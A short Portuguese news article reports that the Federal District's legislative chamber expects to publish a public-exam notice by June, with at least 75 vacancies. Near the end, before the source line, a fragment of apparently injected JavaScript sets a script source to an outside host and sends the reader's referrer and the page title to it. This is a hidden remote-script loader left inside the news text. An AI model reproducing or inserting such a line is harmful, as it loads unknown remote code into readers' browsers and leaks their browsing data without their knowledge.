Câmara Legislativa deverá lançar concurso até junho

Casa espera que edital possa sair a partir do final de maio. Foto: divulgação

A Câmara Legislativa do Distrito Federal deverá lançar, até junho, edital para o próximo concurso público da Casa. Servidores da Primeira-Secretaria finalizam o levantamento das vacâncias e necessidades de pessoal em cada setor para a elaboração do projeto básico. A expectativa é de que sejam abertas pelo menos 75 vagas, em diferentes cargos, com cadastro de reserva.

Na próxima segunda-feira (20), a comissão responsável pela organização do concurso vai se reunir para analisar a distribuição das vagas entre os setores da Casa. “Em duas semanas, finalizamos esse espelho do quadro atual para então definir a contratação da empresa organizadora do concurso”, adianta Inaldo Oliveira, presidente da comissão. A empresa organizadora será contratada sem custos para a Câmara, seguindo a experiência do último concurso realizado em 2005.

A Casa estuda a possibilidade de ampliar o número de vagas, no entanto, o número autorizado pela Lei de Diretrizes Orçamentárias (LDO) deste ano é de 75. “Nossa previsão de que o edital saia no final de maio, mais tardar início de junho”, afirma Inaldo. As provas deverão ocorrer em, no mínimo, 90 dias após a publicação do edital.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário